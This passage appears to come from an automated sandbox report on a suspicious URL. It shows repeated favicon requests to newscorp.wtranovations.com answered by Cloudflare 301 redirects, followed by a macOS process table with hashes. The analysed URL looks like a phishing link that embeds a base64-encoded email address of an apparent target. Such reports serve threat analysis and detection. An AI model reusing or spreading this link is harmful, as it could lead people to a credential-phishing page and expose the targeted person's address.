                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Cf-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 7
                                                                                                                                                                                                                      CF-RAY: 923e2423edd5d9f9-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:23 UTC178INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      64192.168.11.1249441104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:23 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:23 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:23 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 7
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e2427ad074c24-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127330&min_rtt=127311&rtt_var=26884&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=917&delivery_rate=31702&cwnd=252&unsent_bytes=0&cid=df8f9e15c01b7210&ts=317&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:23 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      65192.168.11.1249442104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:24 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:24 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:24 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 8
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e242b6cb0d9c9-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128922&min_rtt=128853&rtt_var=27247&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=917&delivery_rate=31335&cwnd=252&unsent_bytes=0&cid=b7cd41b2dbd42bd0&ts=323&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:24 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      66192.168.11.1249445104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:24 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:24 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 8
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e242f1bed9ab4-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=132510&min_rtt=132503&rtt_var=27962&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=917&delivery_rate=30468&cwnd=252&unsent_bytes=0&cid=edbb24e5bc59c9c1&ts=318&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      67192.168.11.1249446104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:25 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRFld%2BI2zNoZK6AQNT997CNZw8zM%2BngQYdfmd%2F2jsIYz7uYTD%2FcU6mFY%2Fe7KUN1QCh7qAMnbra5e5tF6Ll3zbvYfHlAv3mbFbYCLBKZSENXMndsL%2FLXyp0bIJDFQOyUKvXtt6HsH7YT%2Bxs4HkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=122&min_rtt=122&rtt_var=61&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 9
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e2432caa809ee-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129355&min_rtt=129309&rtt_var=27346&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=917&delivery_rate=31192&cwnd=253&unsent_bytes=0&cid=7fda95033925005a&ts=322&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      Start time (UTC):14:28:53
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
                                                                                                                                                                                                                      Arguments:-
                                                                                                                                                                                                                      File size:3722408 bytes
                                                                                                                                                                                                                      MD5 hash:8910349f44a940d8d79318367855b236
                                                                                                                                                                                                                      Start time (UTC):14:28:53
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/bin/open
                                                                                                                                                                                                                      Arguments:/usr/bin/open -a Safari https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__ !!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      File size:105952 bytes
                                                                                                                                                                                                                      MD5 hash:34bd93241fa5d2aee225941b1ca14fa4
                                                                                                                                                                                                                      Start time (UTC):14:28:53
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/xpcproxy
                                                                                                                                                                                                                      Arguments:-
                                                                                                                                                                                                                      File size:44048 bytes
                                                                                                                                                                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                                                                                                                                                                      Start time (UTC):14:28:53
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      Arguments:/Applications/Safari.app/Contents/MacOS/Safari
                                                                                                                                                                                                                      File size:27120 bytes
                                                                                                                                                                                                                      MD5 hash:2dde28c2f8a38ed2701ba17a0893cbc1
                                                                                                                                                                                                                      Start time (UTC):14:29:20
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/xpcproxy
                                                                                                                                                                                                                      Arguments:-
                                                                                                                                                                                                                      File size:44048 bytes
                                                                                                                                                                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                                                                                                                                                                      Start time (UTC):14:29:20
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/silhouette
                                                                                                                                                                                                                      Arguments:/usr/libexec/silhouette
                                                                                                                                                                                                                      File size:65920 bytes
                                                                                                                                                                                                                      MD5 hash:485ec1bd3cd09293e26d05f6fe464bfd
                                                                                                                                                                                                                      Start time (UTC):14:29:27
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/xpcproxy
                                                                                                                                                                                                                      Arguments:-
                                                                                                                                                                                                                      File size:44048 bytes
                                                                                                                                                                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                                                                                                                                                                      Start time (UTC):14:29:27
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/nsurlstoraged
                                                                                                                                                                                                                      Arguments:/usr/libexec/nsurlstoraged --privileged
                                                                                                                                                                                                                      File size:246624 bytes
                                                                                                                                                                                                                      MD5 hash:321b0a40e24b45f0af49ba42742b3f64
                                                                                                                                                                                                                      Start time (UTC):14:29:48
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/xpcproxy
                                                                                                                                                                                                                      Arguments:-
                                                                                                                                                                                                                      File size:44048 bytes
                                                                                                                                                                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                                                                                                                                                                      Start time (UTC):14:29:48
                                                                                                                                                                                                                      Start date (UTC):21/03/2025
                                                                                                                                                                                                                      Path:/usr/libexec/firmwarecheckers/eficheck/eficheck
                                                                                                                                                                                                                      Arguments:/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
                                                                                                                                                                                                                      File size:74048 bytes
                                                                                                                                                                                                                      MD5 hash:328beb81a2263449258057506bb4987f